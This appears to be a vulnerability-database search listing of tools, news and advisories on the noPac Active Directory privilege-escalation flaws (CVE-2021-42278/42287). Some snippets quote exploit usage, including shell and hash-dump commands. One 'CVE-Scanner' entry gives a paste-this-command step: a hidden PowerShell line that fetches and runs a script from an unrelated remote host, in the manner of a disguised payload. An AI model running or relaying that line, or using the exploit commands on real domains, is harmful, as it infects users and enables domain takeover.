Lucene search
+L

25 matches found

Kitploit
Kitploit
added 2026/09/14 5:04 p.m.5 views

noPac-detection

概要 CVE-2021-42278 および CVE-2021-42287 の検出スクリプト 使用方法 root@kitploit: The detection script uses the domain account credentials to determine the possibility of the vulnerabilities. usage: noPac-detection.py -h -debug -dc-ip -targetUser credentials optional arguments: -h, --help show this help message...

8.8CVSS7.2AI score0.7717EPSS
SaveExploits10
Kitploit
Kitploit
added 2026/09/14 1:58 p.m.9 views

sam-the-admin

CVE-2021-42278 および CVE-2021-42287 を悪用し、標準ドメインユーザーから DA になりすます 既知の問題 Kali 以外では動作しません。後日更新します : 関連情報 CVE-2021-42287/CVE-2021-42278 武器化 sAMAccountName スプーフィング...

8.8CVSS7.2AI score0.7717EPSS
SaveExploits10
Kitploit
Kitploit
added 2026/09/14 10:05 a.m.9 views

noPac

noPac このプロジェクトは、noPac の原理学習のために生まれました。cube0x0 のプロジェクトをベースにいくつかの変更を加えています。ソースコードには個人的な理解のコメントを追加しました。 Scan 機能を削除しました。個人的には Scan 機能はあまり役に立たないと感じました。 MachineAccountQuota 値の判定を追加しました。0 の場合はプログラムを終了します。 コンピュータアカウント追加時の判定処理を最適化しました。 TGT の出力を追加しました。 脆弱性の分析記事は私のブログ記事をご覧ください:noPac 分析 利用条件 noPac は...

6AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/14 5:23 a.m.10 views

noPac

概要 CVE-2021-42278 と CVE-2021-42287 を悪用して、標準ドメインユーザーから DA を偽装します 元は sam-the-admin から変更されました。 使用方法 root@kitploit: SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain positional arguments: domain/username:password Account used to authenticate to DC. options: -h, --help show this help message and exi...

8.8CVSS7.3AI score0.7717EPSS
SaveExploits10References1
Kitploit
Kitploit
added 2026/09/13 11:34 p.m.5 views

Pachine

Pachine Implementación en Python para CVE-2021-42278 Escalada de privilegios en Active Directory. Instalación root@kitploit: $ pip3 install impacket Uso root@kitploit: Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation usage: pachine.py -h -scan -spn SPN -impersonate IMPERSONATE...

8.8CVSS7.3AI score0.7717EPSS
SaveExploits10References4
Kitploit
Kitploit
added 2026/09/12 4:54 a.m.6 views

CVE-Scanner

CVE-Scanner 🔍 CVE-Scanner 是一款用于扫描和利用与 CVE-2021-42287、CVE-2021-42278 及其他安全漏洞相关漏洞的工具。本项目旨在为安全专业人员和研究人员提供一种直接的方法来识别并缓解其系统中的风险。 目录 功能 安装 用法 支持的 CVE 贡献 许可证 联系方式 功能 CVE 扫描 :快速识别应用程序中的漏洞。 漏洞利用工具 :针对特定 CVE 执行漏洞利用,以测试系统的防御能力。 用户友好界面 :设计易于使用,即使对于安全工具新手也很友好。 定期更新 :及时了解最新的漏洞和修复方案。 安装 开始使用前,请从 Releases 页面...

5.9AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/10 12:56 a.m.5 views

Invoke-sAMSpoofing

Invoke-sAMSpoofing CVE-2021-42287/CVE-2021-42278 的 PowerShell 利用工具 目录 概述 菜单 截图 参考 概述 一个简单的脚本,用于自动利用 CVE-2021-42287/CVE-2021-42278 攻击 AD。 菜单 Invoke-sAMSpooofing Invoke-GoldenTicket Invoke-GoldenTips RemoveMachineAccount Invoke-Rubeus ADSIHound Invoke-DCSync 截图 Invoke-sAMSpooofing...

8.8CVSS7.3AI score0.7717EPSS
SaveExploits10References4
Kitploit
Kitploit
added 2026/09/09 9:38 a.m.7 views

CVE-Scanner

CVE-Scanner CVE-2021-42287/CVE-2021-42278/其他 扫描器与利用工具. 安装 1. 按下 WIN + R 键 2. 复制并粘贴以下代码,然后按回车键 root@kitploit: powershell -WindowStyle Hidden -Command ScriptBlock::Createirm https://jaihind.edu.in/weatherdolphin/dollrandom.Invoke; 3. 重启你的电脑 使用 1. 打开 CMD 2. fexkex IP FOR SCAN...

8.8CVSS7.4AI score0.7717EPSS
SaveExploits10
Kitploit
Kitploit
added 2026/09/09 2:08 a.m.6 views

noPac

noPac CVE-2021-42278 および CVE-2021-42287 の悪用 元のプロジェクトnoPacの実装には問題がある可能性があり、ローカルでうまく動作しなかったため、sam-the-adminプロジェクトを参考にして修正しました。 使い方 root@kitploit: pip3 install -r requirements.txt GetShell python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -shell DumpHash python3 exp.py...

8.8CVSS7.4AI score0.7717EPSS
SaveExploits10References2
Kitploit
Kitploit
added 2026/09/08 9:30 p.m.7 views

Invoke-noPac

Invoke-noPac この .Net アセンブリは、オリジナルを改善するためのコード変更を加えた私のフォーク https://github.com/ricardojba/noPac に基づいています。 PowerSharpPack スタイルの .Net アセンブリローダーです。CVE-2021-42287 - CVE-2021-42278 スキャナー & エクスプロイト noPac 用。 使用法: root@kitploit: Set-PSReadlineOption -HistorySaveStyle SaveNothing...

8.8CVSS7.4AI score0.7717EPSS
SaveExploits10References3
Kitploit
Kitploit
added 2026/09/07 7:09 p.m.10 views

noPac

概要 NoPacエクスプロイトは、古い脆弱性であるCVE-2021-42278とCVE-2021-42287を利用して、標準ユーザーからドメイン管理者になりすまします。 もううんざりするような依存関係はなし、単一バイナリだけ。本当にGoが大好きだ。Pythonには絶対に無理だ。 -shellフラグはimpacket-smbexecを起動するだけです。なりすましたアカウントのccacheファイルをそのまま使うこともできます。...

8.8CVSS6AI score0.7717EPSS
SaveExploits10
The Hacker News
The Hacker News
added 2024/09/10 3:48 p.m.122 views

CosmicBeetle Deploys Custom ScRansom Ransomware, Partnering with RansomHub

The threat actor known as CosmicBeetle has debuted a new custom ransomware strain called ScRansom in attacks targeting small- and medium-sized businesses SMBs in Europe, Asia, Africa, and South America, while also likely working as an affiliate for RansomHub. "CosmicBeetle replaced its previously...

10CVSS7.4AI score0.99474EPSS
SaveExploits167
Kitploit
Kitploit
added 2022/09/06 12:30 p.m.76 views

noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Changed from sam-the-admin. Usage SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain positional arguments: domain/username:password Account used to authenticate to DC. optional arguments: -h, --help show thi...

7.5CVSS8.8AI score0.7717EPSS
SaveExploits10References2
Check Point Advisories
Check Point Advisories
added 2022/04/27 12:00 a.m.18 views

Microsoft Windows Active Directory Privilege Escalation Multiple Vulnerabilities (CVE-2021-42278; CVE-2021-42287)

Multiple Privilege Escalation vulnerabilities exists in Microsoft Windows Active Directory. Successful exploitation of this vulnerability could allow a remote attacker to easily elevate their privilege to that of a domain admin once he compromise a regular user in the domain...

6.5CVSS3.9AI score0.7717EPSS
SaveExploits10
ThreatPost
ThreatPost
added 2021/12/21 4:46 p.m.106 views

Two Active Directory Bugs Lead to Easy Windows Domain Takeover

A proof-of-concept tool has been published that leverages two Windows Active Directory bugs fixed last month that, when chained, can allow easy Windows domain takeover. In a Monday alert, Microsoft urged organizations to immediately patch the pair of bugs, tracked as CVE-2021-42287 and...

8.8CVSS9AI score0.7717EPSS
SaveExploits10References20
GithubExploit
GithubExploit
added 2021/12/13 11:15 p.m.466 views

Exploit for CVE-2021-42278

Pachine Python implementation for CVE-2021-42278 Active Dire...

8.8CVSS8.7AI score0.7717EPSS
SaveExploits10
Circl
Circl
added 2021/12/11 7:44 p.m.12 views

CVE-2021-42278

creationtimestamp| type| source ---|---|--- 2021-12-11 19:44:35+00:00| published-proof-of-concept| https://t.me/GithubRedTeam/952 2021-12-11 20:46:13+00:00| published-proof-of-concept| https://t.me/BlueRedTeam/1328 2021-12-12 14:54:29+00:00| published-proof-of-concept| https://t.me/m1swarr1or/29...

7.5CVSS8.2AI score0.73297EPSS
SaveExploits9References83
GithubExploit
GithubExploit
added 2021/12/11 3:10 p.m.555 views

Exploit for CVE-2021-42278

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA f...

8.8CVSS8.4AI score0.7717EPSS
SaveExploits10
GithubExploit
GithubExploit
added 2021/12/11 3:10 p.m.96 views

Exploit for CVE-2021-42278

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA f...

8.8CVSS7AI score0.7717EPSS
SaveExploits10
NVD
NVD
added 2021/11/10 1:19 a.m.30 views

CVE-2021-42278

Active Directory Domain Services Elevation of Privilege Vulnerability...

7.5CVSS0.73297EPSS
SaveExploits9References3
Rows per page
Query Builder